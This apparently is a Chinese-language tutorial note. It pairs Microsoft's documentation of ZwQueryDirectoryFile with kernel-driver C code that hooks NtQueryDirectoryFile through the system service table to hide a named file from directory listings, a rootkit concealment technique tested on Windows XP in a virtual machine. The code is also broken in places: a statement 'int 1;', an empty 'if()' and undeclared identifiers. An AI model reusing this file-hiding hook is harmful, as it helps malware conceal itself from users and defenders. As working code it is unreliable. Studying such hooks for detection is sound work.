NTSTATUS ZwQueryDirectoryFile(  _In_      HANDLE FileHandle,  _In_opt_  HANDLE Event,  _In_opt_  PIO_APC_ROUTINE ApcRoutine,  _In_opt_  PVOID ApcContext,  _Out_     PIO_STATUS_BLOCK IoStatusBlock,  _Out_     PVOID FileInformation,  _In_      ULONG Length,  _In_      FILE_INFORMATION_CLASS FileInformationClass,  _In_      BOOLEAN ReturnSingleEntry,  _In_opt_  PUNICODE_STRING FileName,  _In_      BOOLEAN RestartScan);



   1.FileHandle [in]文件句柄


A handle returned by ZwCreateFile or ZwOpenFile for the file object that represents the directory for which information is being requested. The file object must have been opened for asynchronous I/O if the caller specifies a non-NULL value for Event or ApcRoutine.

   7.FileInformation [out]


A pointer to a buffer that receives the desired information about the file. The structure of the information returned in the buffer is defined by the FileInformationClassparameter.


8.Length [in] 长度,代表缓冲区的size,以字节大小记录。

The size, in bytes, of the buffer pointed to by FileInformation. The caller should set this parameter according to the given FileInformationClass.

9.FileInformationClass [in]文件信息类


The type of information to be returned about files in the directory. One of the following.



Return a FILE_BOTH_DIR_INFORMATION structure for each file.


Return a FILE_DIRECTORY_INFORMATION structure for each file.


Return a FILE_FULL_DIR_INFORMATION structure for each file.


Return a FILE_ID_BOTH_DIR_INFORMATION structure for each file.


Return a FILE_ID_FULL_DIR_INFORMATION structure for each file.


Return a FILE_NAMES_INFORMATION structure for each file.


Return a FILE_OBJECTID_INFORMATION structure for each file. This information class is valid only for NTFS volumes on Windows 2000 and later versions of Windows.


Return a single FILE_REPARSE_POINT_INFORMATION structure for the directory.


ReturnSingleEntry [in]

Set to TRUE if only a single entry should be returned, FALSE otherwise. If this parameter is TRUEZwQueryDirectoryFile returns only the first entry that is found.

FileName [in, optional]

An optional pointer to a caller-allocated Unicode string containing the name of a file (or multiple files, if wildcards are used) within the directory specified by FileHandle. This parameter is optional and can be NULL.

If FileName is not NULL, only files whose names match the FileName string are included in the directory scan. If FileName is NULL, all files are included.

The FileName is used as a search expression and is captured on the very first call to ZwQueryDirectoryFile for a given handle. Subsequent calls toZwQueryDirectoryFile will use the search expression set in the first call. The FileName parameter passed to subsequent calls will be ignored.

RestartScan [in]

Set to TRUE if the scan is to start at the first entry in the directory. Set to FALSE if resuming the scan from a previous call.

When the ZwQueryDirectoryFile routine is called for a particular handle, the RestartScan parameter is treated as if it were set to TRUE, regardless of its value. On subsequent ZwQueryDirectoryFile calls, the value of the RestartScan parameter is honored.


2.hook  NtQueryDirectoryFile()实现对文件的隐藏

  1 #include "ntddk.h"  2    3   4 #pragma pack(1)  5 typedef struct ServiceDescriptorEntry {  6     unsigned int *ServiceTableBase;  7     unsigned int *ServiceCounterTableBase;  8     unsigned int NumberOfServices;  9     unsigned char *ParamTableBase; 10 } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t; 11  12 typedef struct _FILE_BOTH_DIR_INFORMATION { 13     ULONG           NextEntryOffset; 14     ULONG           FileIndex; 15     LARGE_INTEGER   CreationTime; 16     LARGE_INTEGER   LastAccessTime; 17     LARGE_INTEGER   LastWriteTime; 18     LARGE_INTEGER   ChangeTime; 19     LARGE_INTEGER   EndOfFile; 20     LARGE_INTEGER   AllocationSize; 21     ULONG           FileAttributes; 22     ULONG           FileNameLength; 23     ULONG           EaSize; 24     CCHAR           ShortNameLength; 25     WCHAR           ShortName[12]; 26     WCHAR           FileName[1]; 27 } FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION; 28   29   30 // Our System Call Table 31 PVOID* NewSystemCallTable; 32   33 // Our Memory Descriptor List 34 PMDL pMyMDL; 35   36 #define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1) 37   38 #define HOOK(functionName, newPointer2Function, oldPointer2Function )   39        oldPointer2Function = (PVOID) InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function) 40   41 #define UNHOOK(functionName, oldPointer2Function)   42        InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) oldPointer2Function) 43   44 NTSYSAPI 45 NTSTATUS 46 NTAPI ZwQueryDirectoryFile( 47   IN  HANDLE FileHandle, 48   IN  HANDLE Event OPTIONAL, 49   IN  PIO_APC_ROUTINE ApcRoutine OPTIONAL, 50   IN  PVOID ApcContext OPTIONAL, 51   OUT PIO_STATUS_BLOCK IoStatusBlock, 52   OUT PVOID FileInformation, 53   IN  ULONG Length, 54   IN  FILE_INFORMATION_CLASS FileInformationClass, 55   IN  BOOLEAN ReturnSingleEntry, 56   IN  PUNICODE_STRING FileName OPTIONAL, 57   IN  BOOLEAN RestartScan 58   ); 59   60   61 typedef NTSTATUS (__stdcall*  ZWQUERYDIRECTORYFILE)( 62   __in  HANDLE FileHandle, 63   __in_opt  HANDLE Event OPTIONAL, 64   __in_opt  PIO_APC_ROUTINE ApcRoutine OPTIONAL, 65   __in_opt  PVOID ApcContext OPTIONAL, 66   __out PIO_STATUS_BLOCK IoStatusBlock, 67   __out PVOID FileInformation, 68   __in  ULONG Length, 69   __in  FILE_INFORMATION_CLASS FileInformationClass, 70   __in  BOOLEAN ReturnSingleEntry, 71   __in  PUNICODE_STRING FileName OPTIONAL, 72   __in  BOOLEAN RestartScan 73   ); 74  75 int  ZwQueryDirectoryFileIndex;//作为ZwQueryDirectoryFileIndex在ssdt索引地址中的相对路径。 76  77   78 NTSTATUS  __stdcall NewNtQueryDirectoryFile( 79   __in  HANDLE FileHandle, 80   __in_opt  HANDLE Event , 81   __in_opt  PIO_APC_ROUTINE ApcRoutine, 82   __in_opt  PVOID ApcContext OPTIONAL, 83   __out PIO_STATUS_BLOCK IoStatusBlock, 84   __out PVOID FileInformation, 85   __in  ULONG Length, 86   __in  FILE_INFORMATION_CLASS FileInformationClass, 87   __in  BOOLEAN ReturnSingleEntry, 88   __in  PUNICODE_STRING FileName, 89   __in  BOOLEAN RestartScan 90   ) 91 { 92   NTSTATUS status; 93   ANSI_STRING ansiFileName,ansiDirName,HideDirFile; 94   UNICODE_STRING uniFileName; 95   ZWQUERYDIRECTORYFILE OldZwQueryDirectoryFile; 96   int 1; 97   //测试C盘中的123.txt是否可以被隐藏。 98   RtlInitAnsiString(&HideDirFile,"123.txt");  99   KdPrint(("hide: NewZwQueryDirectoryFile called."));100 101   if(MmIsAddressValidEx(OriginalServiceDescriptorTable->ServiceTable[ZwQueryDirectoryFileIndex]))//判断函数的地址是否有效102 {103       OldZwQueryDirectoryFile=OriginalServiceDescriptorTable->ServiceTable[ZwQueryDirectoryFileIndex];104 }105 else106       OldZwQueryDirectoryFile=KeServiceDescriptorTable->ServiceTable[ZwQueryDirectoryFileIndex];107 108  status = OldZwQueryDirectoryFile (109                   FileHandle,110                   Event,111                   ApcRoutine,112                   ApcContext,113                   IoStatusBlock,114                   FileInformation,115                   Length,116                   FileInformationClass,117                   ReturnSingleEntry,118                   FileName,119                   RestartScan);120  if()121   //这部分是隐藏文件的核心部分122     if(NT_SUCCESS(status)&&FileInformationClass==FileBothDirectoryInformation)123   {124     PFILE_BOTH_DIR_INFORMATION pFileInfo;125     PFILE_BOTH_DIR_INFORMATION pLastFileInfo;126     BOOLEAN bLastOne=FALSE;127     pFileInfo = (PFILE_BOTH_DIR_INFORMATION)FileInformation; 128     pLastFileInfo = NULL;129     do130     {131 bLastOne = !( pFileInfo->NextEntryOffset );132 RtlInitUnicodeString(&uniFileName,pFileInfo->FileName);   RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE);133 RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE);134 135 if( RtlCompareMemory(ansiFileName.Buffer,HideDirFile.Buffer,HideDirFile.Length ) == HideDirFile.Length)136       {137           if(bLastOne) 138           {139               pLastFileInfo->NextEntryOffset = 0;140               break;141           } 142           else //指针往后移动143           {144             int iPos = ((ULONG)pFileInfo) - (ULONG)FileInformation;145             int iLeft = (DWORD)Length - iPos - pFileInfo->NextEntryOffset;146             RtlCopyMemory( (PVOID)pFileInfo, (PVOID)( (char *)pFileInfo + pFileInfo->NextEntryOffset ), (DWORD)iLeft );147             continue;148           }149       }150       pLastFileInfo = pFileInfo;151       pFileInfo = (PFILE_BOTH_DIR_INFORMATION)((char *)pFileInfo + pFileInfo->NextEntryOffset);152     }while(!bLastOne);153     RtlFreeAnsiString(&ansiDirName); 154     RtlFreeAnsiString(&ansiFileName);155   }156 goto  _FunctionRet;157 158 _FunctionRet:159 160      return   status;161162 }163  


(ULONG)pFileInfo ;//即把地址转化为ULONG型变量。

 (ULONG) FileInformation;

那么int  iPos=((ULONG)pFileInfo)- (ULONG) FileInformation;


 int  iLeft=(DWORD)Length-iPos-pFileInfo->NextEntryOffset;


4.在Vmware虚拟机中,操作系统是Windows XP,做测试。



